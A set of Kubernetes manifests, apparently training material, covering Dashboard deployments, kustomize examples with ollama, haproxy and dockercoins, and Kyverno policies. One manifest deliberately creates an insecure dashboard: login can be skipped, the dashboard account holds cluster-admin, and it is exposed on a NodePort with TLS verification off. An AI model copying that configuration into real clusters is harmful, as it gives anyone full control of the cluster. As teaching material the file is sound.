apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
kind: ConfigMap
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: kubernetesui/dashboard:v2.0.0-rc2
imagePullPolicy: Always
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
- --namespace=kubernetes-dashboard
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
- --enable-skip-login
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
ports:
- port: 8000
targetPort: 8000
selector:
k8s-app: dashboard-metrics-scraper
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: dashboard-metrics-scraper
template:
metadata:
labels:
k8s-app: dashboard-metrics-scraper
annotations:
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
spec:
containers:
- name: dashboard-metrics-scraper
image: kubernetesui/metrics-scraper:v1.0.2
ports:
- containerPort: 8000
protocol: TCP
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 8000
initialDelaySeconds: 30
timeoutSeconds: 30
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
volumes:
- name: tmp-volume
emptyDir: {}
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: insecure-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -0,0 +1,162 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy

View File

@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup

View File

@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check

View File

@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1

View File

@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment by copying
# a volume and a container from the haproxy Deployment's
# pod template.
# The idea is to allow running ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separately, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed appending to or
# merging lists in "replacements"; but that doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed performing
# a strategic merge using a fieldPath as the source, because
# we could then merge both the containers and the volumes in
# a single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable, so we decided not to do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# restartPolicy=Always; see the sketch after this file).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort
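For reference, a rough sketch of the "real sidecar" form mentioned in the comment above. This is an assumption about how it could look on Kubernetes 1.29+, where native sidecar support (initContainers with restartPolicy: Always) is enabled by default; it is not what this component currently produces.

# Hypothetical fragment of the ollama pod template, with haproxy as a native sidecar:
spec:
  template:
    spec:
      initContainers:
      - name: haproxy                # same definition as in haproxy.yaml
        image: haproxy:3.0
        restartPolicy: Always        # turns this initContainer into a long-running sidecar
        volumeMounts:
        - name: haproxy
          mountPath: /usr/local/etc/haproxy
        ports:
        - name: haproxy
          containerPort: 8000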

View File

@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue

View File

@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so whenever the ConfigMap is edited, any workload using it
# will automatically do a rolling update (see the sketch after
# this file).
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example below adds CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# The (commented-out) JSON patch below would have the same effect, with one caveat:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key difference, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar
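To illustrate the hash-suffix behavior described in the comments above, the output of `kustomize build` could look roughly like this (the suffix shown is just the example value from the comment; the real one depends on the ConfigMap contents):

apiVersion: v1
kind: ConfigMap
metadata:
  name: ollama-8bk8bd8m76
data:
  model: "gemma3:270m"
  prompt: "If you visit Paris, I suggest that you"
  queue: "4"
---
# ...and every reference in the ollama Deployment is rewritten to match, e.g.:
env:
- name: OLLAMA_MAX_QUEUE
  valueFrom:
    configMapKeyRef:
      name: ollama-8bk8bd8m76
      key: queue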

View File

@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP

View File

@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis

View File

@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image
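As a quick sketch of what this transformer is meant to do, here is the image field of the hasher Deployment from microservices.yaml, before and after `kustomize build`:

# Before:
containers:
- image: dockercoins/hasher:v0.1
  name: hasher
# After (the ghcr.io/ prefix is prepended to the whole field):
containers:
- image: ghcr.io/dockercoins/hasher:v0.1
  name: hasher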

View File

@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml

View File

@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0
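A rough illustration of the intent of this replacement: each selected image field is split on the "/" delimiter, the element at index 0 is replaced with the source value, and the pieces are joined back together, so only the registry/organization part changes:

# Before:           dockercoins/hasher:v0.1
# Split on "/":     [ "dockercoins", "hasher:v0.1" ]
# Replace index 0:  [ "ghcr.io/dockercoins", "hasher:v0.1" ]
# After:            ghcr.io/dockercoins/hasher:v0.1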

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix
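As a hedged illustration of what this policy generates (the Service name and namespace below are made up, and A.B.C.D stands for the ingress controller address, as elsewhere in these files): creating a Service named blue in namespace default would result in roughly this Ingress:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: blue
  namespace: default
spec:
  rules:
  - host: blue.default.A.B.C.D.nip.io
    http:
      paths:
      - backend:
          service:
            name: blue
            port:
              number: 80
        path: /
        pathType: Prefix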

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: http
operator: In
value: "{{request.object.spec.ports[*].name}}"
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,34 +0,0 @@
# Note: this policy uses the operator "AnyIn", which was introduced in Kyverno 1.6.
# (This policy won't work with Kyverno 1.5!)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[*].port}}"
operator: AnyIn
value: [ 80 ]
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix
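This variant reads the domain from a ConfigMap in the Service's namespace instead of hard-coding it in the policy. A minimal sketch of that ConfigMap (the domain value is a placeholder, like A.B.C.D elsewhere in these files):

apiVersion: v1
kind: ConfigMap
metadata:
  name: ingress-domain-name
data:
  domain: A.B.C.D.nip.io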

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}

View File

@@ -1,22 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
rules:
- name: ensure-pod-color-is-valid
match:
resources:
kinds:
- Pod
selector:
matchExpressions:
- key: color
operator: Exists
- key: color
operator: NotIn
values: [ red, green, blue ]
validate:
failureAction: Enforce
message: "If it exists, the label color must be red, green, or blue."
deny: {}
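In other words, this rule matches Pods that carry a color label whose value is not red, green, or blue, and denies their admission. A minimal sketch of a Pod that would be rejected (the label value is arbitrary):

apiVersion: v1
kind: Pod
metadata:
  name: purple-pod
  labels:
    color: purple      # not in [red, green, blue], so the request is denied
spec:
  containers:
  - name: web
    image: nginx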

View File

@@ -1,31 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be changed."
deny:
conditions:
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: "{{ request.oldObject.metadata.labels.color }}"

View File

@@ -1,26 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
